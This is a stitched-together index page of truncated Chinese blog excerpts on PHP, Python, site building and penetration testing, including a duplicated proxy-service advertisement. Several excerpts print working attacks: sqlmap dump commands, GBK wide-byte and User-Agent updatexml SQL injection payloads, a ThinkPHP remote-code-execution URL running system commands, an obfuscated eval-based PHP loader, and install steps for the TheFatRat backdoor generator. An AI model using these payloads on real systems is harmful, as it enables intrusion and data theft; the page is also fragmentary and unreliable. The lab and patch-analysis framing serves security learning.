建站VPS工具综合杂谈

#写在前面： 过狗相关的资料网上也是有很多，所以在我接下来的文章中，可能观点或者举例可能会与网上部分雷同，或者表述不够全面。 但是我只能说，我所传达给大家的信息，是我目前所掌握或者了解的，不能保证所有人都会有收获，但是个人水平有限，可能您觉得文章水平过低，或者并无太大营养。但是跳出文章本身，无论何种技术，重在交流，分享与总结。 另外，希望年轻人不要有太多戾气，更多的是需要保持一个谦逊态度对待技术，尤其是这个浮躁的安全界。 以上是我的开场白（没办法，这是我的一贯风格） 写php后门连载的目的。希望大家能够暂缓日站的脚步，静下心来想一想，我们在用菜刀做一些除(sang)暴(jin)安(tian)良(liang)的事的时候，php做了些什么，安全狗又蜷缩在门后目睹了些什么。 其实我更愿意传授安全之道，而非渗透之术。 参考过网上很多种已有的php后门的写法，总之思路各种奇葩与新奇，但是衡量一个优秀的php后门并不是单单的看代码多少，过狗怎么样，而是一种基于实际场景的一种变通，所以，php后门这是一门艺术。 连接后门时发生了什么所以当我在菜刀中双击连接的时候到底发生了什么，安全狗又是如何发现后门并拦截的？ php后门原理很简单，当我们连接时，实际上我们会向php文件post数据，这个数据的内容为我们需要php去执行的代码，当php获取到数据并执行后，将返回一个response。 那么waf能够识别到什么层次？其实waf最多获取到tcp数据，也就是说，可以获取到我们所post的数据，与服务器所返回的数据，至于php执行命令的过程，用了什么对象，走了什…

在有时候我们利用PHP编写部分代码的时候，会碰到部分php代码加密的情况，那么我们该如何解密php代码呢？示例代码<?php // $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=16;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsy…

1.判断文件/目录是否存在is_file函数 is_file — 判断给定文件名是否为一个正常的文件，如果文件存在且为正常的文件则返回 TRUE，否则返回 FALSE。 官方说明：http://php.net/manual/zh/function.is-file.php is_dir函数 is_dir() 函数检查指定的文件是否是一个目录。如果文件名存在，并且是个目录，返回 TRUE，否则返回FALSE。 官方说明：http://php.net/manual/zh/function.is-dir.php file_exists() 函数 file_exists() 函数检查文件或目录是否存在。如果指定的文件或目录存在则返回 true，否则返回 false。有点像上面2个函数的综合体。 更多说明参考：PHP file_exists() 函数 2.读取文件file_get_contents()函数 file_get_contents — 将整个文件读入一个字符串 PHP官方使用说明：http://php.net/manual/zh/function.file-get-contents.php fread() 函数 读取这个文件的列子： <?php $file = fopen("test.txt","r"); fread($file,filesize("test.txt")); fclose($file); ?>更多使用说明可参考：PHP fread() 函数 3.写入文件PHP fread() 函数 实例： <?php…

前言生成excel 当然使用的是 phpExcel这个类库了,可是它太麻烦了,对于只要简单生成来说有点不值得什么叫简单,把数据库的数据导入到excel就行了, 这个就是简单了 代码如下：<?php header("Content-type:application/vnd.ms-excel"); header("Content-Disposition:filename=test.xls"); echo "test1\t"; echo "test2\t\n"; echo "test1\t"; echo "test2\t\n"; echo "test1\t"; echo "test2\t\n"; echo "test1\t"; echo "test2\t\n"; echo "test1\t"; echo "test2\t\n"; echo "test1\t"; echo "test2\t\n"; ?>

利用Pr如何消除音频中的杂音呢？好吧~我承认貌似和网络安全无关，但是为了凑文章数~ 首先我们先听一听原音频 利用Pr消音新建项目-将音频素材导入Pr 在效果面板中找到降噪 将其拖入到音轨 在效果控件中编辑参数即可 最后听听效果

说实在的Pyhon在数据处理方面确实很牛。尤其是大数据的今天，我们和形形色色的数据形影不离。本文给大家介绍下利用百度OCR进行文字识别。实验环境Python (3.9.12)Kali Linux百度OCR 申请百度OCR访问百度智能云，开通API 网址：https://cloud.baidu.com/campaign/OCR202203/index.html 可以使用百度账号登录，使用百度登录的好处是，你可以把百度的实名认证直接迁移过来，就不需要再等几天人工审核了。 你可以选择免费试用，或者1块钱买1万次，我觉得没什么区别，都是够用的。 领取免费额度的时候要勾选接口类型，要不然是一片空白。 新建应用，获取token 在控制台-文字识别-概览中点击创建应用 应用归属选择个人，应用名称和概述就随便填 创建完成之后，进入应用列表，可以看到API Key和Secret Key，记下来。 文字识别根据官方示例，写了Python的简单列子。参考如下： from aip import AipOcr APP_ID = 'xxxxxx'#你的APP_ID API_KEY = 'xxxxxxxxx'#你的API_KEY SECRET_KEY = 'xxxxxxxx'#你的SECRET_KEY client = AipOcr(APP_ID, API_KEY, SECRET_KEY) def get_file_content(filePath): with open(filePath, 'rb') as fp: return fp.read() imag…

还在愁斗图没有表情包吗？so让你斗图更加疯狂吧！ 素材处理利用图片处理工具，将bj.jpg处理为300*300 安装依赖pip install image将背景图和表情合成from PIL import Image, ImageDraw, ImageFont img = Image.open("bj.jpg") jgz = Image.open("11.png") img.paste(jgz,(90,50)) img.show() img.save("Python生成的表情包.jpg")效果如下 给表情添加文字draw = ImageDraw.Draw(img) ttfront = ImageFont.truetype('simhei.ttf', 24) draw.text((60, 230),"来啊~快活啊 \n 反正有大把时光",fill=(0,0,0), font=ttfront) 完整代码from PIL import Image, ImageDraw, ImageFont img = Image.open("bj.jpg") jgz = Image.open("11.png") img.paste(jgz,(90,50)) #上下左右的坐标 draw = ImageDraw.Draw(img) ttfront = ImageFont.truetype('simhei.ttf', 24) draw.text((60, 230),"来啊~快活啊 \n 反正有大把时光",fill=(0,0,0), font=ttfront) img.…

如何利用Python处理学生的成绩表呢?在实际问题中，我们常用excel来完成此工作。如计算平均分、总分、及格人数等。如何利用Python来完成此工作呢? 前期准备Python3.9所需模块pandas openpyxl成绩表.xlsx win10安装pyton环境Python 安装包下载地址：https://www.python.org/downloads/ 打开该链接，点击下图中的版本号或者Download按钮进入对应版本的下载页面，滚动到最后即可看到各个平台的 Python 安装包。 对前缀的说明： 以Windows installer (64-bit)开头的是 64 位的 Python 安装程序； 以Windows installer (32-bit)开头的是 32 位的 Python 安装程序。 对后缀的说明： embeddable zip file表示.zip格式的绿色免安装版本，可以直接嵌入（集成）到其它的应用程序中； executable installer表示.exe格式的可执行程序，这是完整的离线安装包，一般选择这个即可； web-based installer表示通过网络安装的，也就是说下载到的是一个空壳，安装过程中还需要联网下载真正的 Python 安装包。 *注意勾选Add Python 3.9 to PATH，这样可以将 Python 命令工具所在目录添加到系统 Path 环境变量中，以后开发程序或者运行 Python 命令会非常方便。 继续点击下一步，这样便很快完成python的安装。 验证 在cmd中…

博客主要是以 佛系更新为主，百度收录惨淡就不提了。作为一名合格的博主，如何让百度爹地更好的收录呢？除了 sitemap 自动推送等方式外，还有那些方法呢？ 流程图 python代码import re from time import sleep import requests try: with open(r'sitemap.xml', 'r', encoding='UTF-8') as f: a = f.read() p = re.compile(r'https://(.+)</loc>') r = p.findall(a) data = '\n'.join(r) url = f'http://data.zz.baidu.com/urls?site=你的域名&token=你的token' #记得修改成自己的网址和token a = requests.post(url, data=data) print(a.text) sleep(3) except FileNotFoundError: print('请将sitemap.xml和本程序放在同一目录下') sleep(3)登录百度站长中心，获取你自己的 token 命名为 seo.py名字可以自定义。 shell脚本#!/bin/ #进入到seo优化文件 cd /root/seo #下载远程site…

利用Python对mysql进行读写操作，创建数据库，插入数据，更新数据，删除数据等操作。 连接数据库#!/usr/bin/python #-*- coding: UTF-8 -*- import MySQLdb #打开数据库连接 db = MySQLdb.connect("localhost", "testuser", "test123", "TESTDB", charset='utf8' ) #使用cursor()方法获取操作游标 cursor = db.cursor() #使用execute方法执行SQL语句 cursor.execute("SELECT VERSION()") #使用 fetchone() 方法获取一条数据 data = cursor.fetchone() print "Database version : %s " % data #关闭数据库连接 db.close()创建数据库表#!/usr/bin/python #-*- coding: UTF-8 -*- import MySQLdb #打开数据库连接 db = MySQLdb.connect("localhost", "testuser", "test123", "TESTDB", charset='utf8' ) #使用cursor()方法获取操作游标 cursor = db.cursor() #如果数据表已经存在使用 execute() 方法删除表。 cursor.execute("DROP TABLE IF EXISTS EM…

本文将利用python调用nmap完成扫描，并将扫描结果通过表格的方式展示出来。以便扫描者更加清晰明了的观察扫描结果。 实验环境Python3nmap7.9 代码如下：#!/usr/bin/env pthon #--*--coding=utf-8--*-- #kali blog(https://blog.bbskali.cn) #逍遥子大表哥 import os from terminaltables import AsciiTable gateway = input('YOU IP Address:') print ("\033[31m稍等 正在扫描\033[0m") print ("当前网关变量为：",gateway) def scan(): scan = os.popen("nmap " + gateway + " -n -P").read() f = open('scan.txt','w') f.write(scan) f.close() devices = os.popen(" grep report scan.txt | awk '{print $5}' ").read() devices_mac = os.popen("grep MAC scan.txt | awk '{print $3}'").read() + os.popen("ip addr | grep 'state UP' -A1 | tail -n1 | awk '{print $2}' | cut -f1 -d'/' ").…

ServerStatus-Toyo版是一个酷炫高逼格的云探针、云监控、服务器云监控、多服务器探针 该探针又服务器端和客户端两方面构成，服务端只安装一个，客户端需要在监控的VPS上面安装。 一、服务器端安装登录服务器，下载脚本。 附件下载 下载完成后，上传到服务器。 在终端执行 status.sh s 需要注意的是，由于网络环境的问题，安装过程可能会失败。多尝试几次即可！！！ 1.2设置端口这里默认回车即可（35601）需要注意的是，需要在安全组中放行改端口。 1.3 配置web由于我们的服务器已经配置好了web环境，所以这里我们选择N 然后，我们到宝塔或者Apache中新建虚拟主机，并且解析到目录/usr/local/ServerStatus/web 如上，看到如上所示，证明我们的服务端就安装完成。 1.4 验证在浏览器中输入你刚才解析的域名或者ip地址，要是能够访问探针页面，则说明安装成功。 安装客户端登录需要被监控的服务器 下载一键安装脚本(同服务器端脚本) 客户端脚本 2.1安装客户端在终端执行 status.sh c 按1选择安装客户端 2.2 输入服务器端的IP,或者服务器端配置的域名这里的ip地址或者域名为你的服务端的ip或者域名，如果你的客户端和服务器在同一服务器。默认127.0.0.1即可。 2.3 输入端口默认即可（要和服务端的端口一样） 2.4 为本台服务器添加客户端用户名及密码 保存好刚才设置的账号和密码，后面再服务端添加节点的时候要用。 这样，我们的客户端就安装和配置完成了。现在我们返回到服务端添加节点即…

你是否在尋找一款穩定、高效的IP代理工具，助力你的網路爬蟲、跨境電商、資料收集、遊戲加速或社群媒體管理？ Smart Proxy 為你提供大量高匿IP資源，全球覆蓋，安全穩定，滿足各類業務需求！ 為什麼選擇Smart proxies？ 海量IP池－覆蓋全球200+國家地區，輕鬆切換不同地區IP； 高匿穩定－HTTP、HTTPS、SOCKS5協定支持，高匿名度，安全穩定； 高速連線－優質線路，低延遲，確保流暢體驗； 性價比高－彈性套餐，隨選購買，低成本高收益； 便利操作－API呼叫支持，一鍵切換IP，適用於各種應用場景。 適用場景： 爬蟲資料收集，突破反爬限制 跨境電商，防關聯操作 遊戲加速，暢玩全球服 社媒行銷，多帳號管理 限時優惠活動 現在註冊 Smart proxies，新用戶可享專屬折扣，更有免費流量等你體驗！ 官網位址： SmartProxies-涵盖全球220地区-真实纯净全球动态住宅ip 私人訂位；聯絡专属客戶經理： 中国官网:https://www.smartproxycn.com/?keyword=0xweaz0l V X : Renxiaobo____

你是否在尋找一款穩定、高效的IP代理工具，助力你的網路爬蟲、跨境電商、資料收集、遊戲加速或社群媒體管理？ Smart Proxy 為你提供大量高匿IP資源，全球覆蓋，安全穩定，滿足各類業務需求！ 為什麼選擇Smart proxies？ 海量IP池－覆蓋全球200+國家地區，輕鬆切換不同地區IP； 高匿穩定－HTTP、HTTPS、SOCKS5協定支持，高匿名度，安全穩定； 高速連線－優質線路，低延遲，確保流暢體驗； 性價比高－彈性套餐，隨選購買，低成本高收益； 便利操作－API呼叫支持，一鍵切換IP，適用於各種應用場景。 適用場景： 爬蟲資料收集，突破反爬限制 跨境電商，防關聯操作 遊戲加速，暢玩全球服 社媒行銷，多帳號管理 限時優惠活動 現在註冊 Smart proxies，新用戶可享專屬折扣，更有免費流量等你體驗！ 官網位址： SmartProxies-涵盖全球220地区-真实纯净全球动态住宅ip 私人訂位；聯絡专属客戶經理： 中国官网:https://www.smartproxycn.com/?keyword=0xweaz0l V X : Renxiaobo____

验证是否有注入我们直接输入一个字符k，点击搜索。 提示未见异常 我们输入关键字%k% 效果如下： 此时，我们可以得出，存在搜索型注入漏洞 攻击方式一利用burp抓包，将包中的文件另存为22.txt 将22.txt放到sqlmap根目录 /usr/share/sqlmap 爆出数据库sqlmap -r "22.txt" --dbs 爆出表sqlmap -r "22.txt" -D lou --tables 爆出表结构sqlmap -r "22.txt" -D lou -T users --columns 方式二不需要抓包保存文件的形式，直接执行命令 sqlmap -u http://192.168.123.129/vul/sqli/sqli_search.php? --data "name=*&submit=%E6%90%9C%E7%B4%A2" --dbs

前言：软件： burpsqlmap 软件配置 设置代理打开kali中自带的火狐浏览器 点击设置 --网络设置 漏洞环境安装 数字型注入（post）篇利用burp抓包，将包中的文件另存为33.txt 爆出数据库sqlmap -r "/root/22.txt" --dbs 爆出表sqlmap -r "22.txt" -D lou --tables 爆出表结构sqlmap -r "22.txt" -D lou -T users --columns 爆出表数据sqlmap -r "/root/33.txt" -D kalibc -T users -C "username,password" --dump 视频 字符型注入打开Pikachu中的字符型注入 字符型注入 字符型注入原理是 ‘false’ or true#‘恒为真 连接数据库，输入select * id,email from member where id = ‘KOBE’ 会输出 KOBE账号的email 那么，我们可以想象如果在输入框输入一段字符，使其合理拼接到sql中，是不是就可以执行遍历了呢 我们在输入框输入 kali’ or 1 = 1# (前面一个单引号是与sql原有的’拼接 后面的#注释掉后面原有’） sqlmap注入之（搜索型）注入验证是否有注入 我们直接输入一个字符k，点击搜索。 提示未见异常 我们输入关键字%k% 效果如下： QQ截图20190404110711.png 此时，我们可以得出，存在搜索型注入漏洞 攻击方式一 利用burp抓包，将包中的文件另存为2…

注入原理在magic_quotes_gpc=On的情况下，提交的参数中如果带有单引号’，就会被自动转义\’，使很多注入攻击无效， GBK双字节编码：一个汉字用两个字节表示，首字节对应0×81-0xFE，尾字节对应0×40-0xFE（除0×7F），刚好涵盖了转义符号\对应的编码0×5C。 0xD50×5C 对应了汉字“诚”，URL编码用百分号加字符的16进制编码表示字符，于是 %d5%5c 经URL解码后为“诚”。 下面分析攻击过程： /test.php?username=test%d5′%20or%201=1%23&pwd=test 经过浏览器编码，username参数值为(单引号的编码0×27) username=test%d5%27%20or%201=1%23 经过php的url解码 username=test 0xd5 0×27 0×20 or 0×20 1=1 0×23 (为了便于阅读，在字符串与16进制编码之间加了空格) 经过PHP的GPC自动转义变成(单引号0×27被转义成\’对应的编码0×5c0×27)： username=test 0xd5 0×5c 0×27 0×20 or 0×20 1=1 0×23 因为在数据库初始化连接的时候SET NAMES ‘gbk’，0xd50×5c解码后为诚，0×27解码为’，0×20为空格，0×23为mysql的注释符# 上面的SQL语句最终为： SELECT * FROM user WHERE username=’test诚’ or 1=1#’ and password=’tes…

什么是Http Header注入有些时候，后台开发人员为了验证客户端头信息（比如常用的cookie验证） 或者通过http header头信息获取客户端的一些信息，比如useragent、accept字段等等。 会对客户端的http header信息进行获取并使用SQL进行处理，如果此时没有足够的安全考虑 则可能会导致基于http header的SQL Inject漏洞。 基于user-agent字段验证在user-agent字段后输入'效果如下 爆出数据库User-Agent: 1'or updatexml(1,concat(0x7e,(database())),0) or' 爆出表User-Agent: test001' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='lou' limit 0,1)),0) or' 爆出列User-Agent:test001' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1)),0) or' 爆出内容User-Agent:test001' or updatexml(1,concat(0x7e,(select concat_ws(':', username, password) …

Submitted by dravenk on Wed, 08/08/2018 - 16:06 所需条件： 一台具有公网地址的服务器一台局域网内的电脑在内网的电脑上执行： ssh -qTfNn -R '[::]:8787:localhost:8887' User@RemoteHost解释：访问远程服务器（RemoteHost）的 8787 端口，会将访问转发到内网电脑的 8887 端口。 还需要 vim /etc/ssh/sshd_config加上 GatewayPorts yes

一：简介一个简单的工具来生成后门和简单的工具来开发攻击像浏览器攻击,dll。这个工具编译与流行的恶意软件的有效载荷,然后可以执行编译的恶意软件在windows上,android,mac。使用此工具创建的恶意软件也有一个能力绕过大部分杀毒软件保护。 安装git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat chmod +x setup.sh && ./setup.sh视频演示

前言ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本，推荐尽快更新到最新版本。 漏洞分析Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815 关键代码：// 获取控制器名 $controller = strip_tags($result[1] ?: $this->rule->getConfig('default_controller'));在修复之前程序未对控制器进行过滤，导致攻击者可以通过引入\符号来调用任意类方法。 漏洞利用执行系统命令显示目录下文件http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l …

TPLINK-R476G是基于企业级路由器，拥有行为管理 认证管理 VPN 动态DNS等功能。是一款不错的路由器，公司网络最新优化，购买了不少的设备，在配置网络过程中发现了这款路由器有web认证功能。在这里作一简要的说明： 登录路由器 认证管理-web认证配置相关的AP和参数 配置用户在配置用户管理中，添加用户！ 当其他用户访问时，会弹出认证页面，需要输入相应的账号和密码便可以上网了。

typecho的seo优化，相对来说还是很不错的。但是我们的搜索引擎最喜欢爬取静态的页面，如hello.html而对于动态的页面效果肯定没有静态的好。typecho默认的网址路劲为https://xxx.com/index.php/archives/{cid}/本文教你怎样优化网址链接。 去掉index.php在网站根目录下新建文件.htaccess 写入内容如下： <IfModule mod_rewrite.c> Options +FollowSymLinks RewriteEngine on RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ /index.php/$1 [L] </IfModule>保存后，登录网站后台，永久链接设置 启用地址从写功能，并自定义网站网址路劲/{cid}.html 解决404问题如果你的网站是新站，或者百度收录比较少的话，这样就可以了。但是笔者的网站上线时间比较长，百度收录的也比较多。那么问题来了，百度收录的地址是https://blog.bbskali.cn/index.php/archives/22/而我现在的新地址是https://blog.bbskali.cn/22.html如果从百度访问站点直接404 解决方案： 在博客主题404写入下面文件 <?php $error_url = '//'.$_SERV…

pushState + ajax = pjax 带来最直观的效果是整个网站变成单页应用。这样的效果将会极大的提升用户体验，并且可以减少https的请求的次数和内容。使用github上面的一个开源项目defunkt/jquery-pjax 可以很轻松的帮助我们实现pjax。 需要具备基础的html & javascript 知识。如果你连div和script标签仍然不认识，请忽略该篇文章。 引入js在header.php或者footer.php中添加下面代码 <script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script> <script src="//cdn.bootcss.com/jquery.pjax/1.9.6/jquery.pjax.min.js"></script>注意顺序，不能错哦！ 实现代码<script> //pjax 刷新 $(document).pjax('a[href^="<?php Helper::options()->siteUrl()?>"]:not(a[target="_blank"], a[no-pjax])', { container: '#pjax-container', fragment: '#pjax-container', timeout: 3000 }).on('pjax:send', function() { …

前言相信大部分做过网站的朋友都知道，Gravatar 是一个全球性的头像设置平台，除中国以外大部分网站都是调用的此平台头像，但因为我们伟大的祖国有一般人射不穿的城墙（网友们都懂的๑乛◡乛๑），所以用这个头像平台的用户很少，导致大部分使用此头像平台的网站，评论区总会有很多 Gravatar 官方头像。 定位文件找到主题下的comments.php文件，查找关键字gravatar 我们会发现下面一段语句 <?php $comments->gravatar('40', ''); ?> 果断删掉$comments->gravatar('40', '');，再去文章页刷新一看，头像果然消失了，这时我们再重新输出一个 img 标签就好了。 接下来搞定头像获取就好啦，去数据库看了看，存邮箱的字段名是 mail，所以获取内容应该是$comments->mail;，先 new 个变量获取下邮箱吧$number=$comments->mail;。 接下来就好说了，把接口里的"QQ 号"改为"$number"，然后 echo 一下就好喽。 <span itemprop="image"><?php $number=$comments->mail; echo '<img src="https://q2.qlogo.cn/headimg_dl? bs='.$number.'&dst_uin='.$number.'&dst_uin='.$number.'&;dst_uin='.$…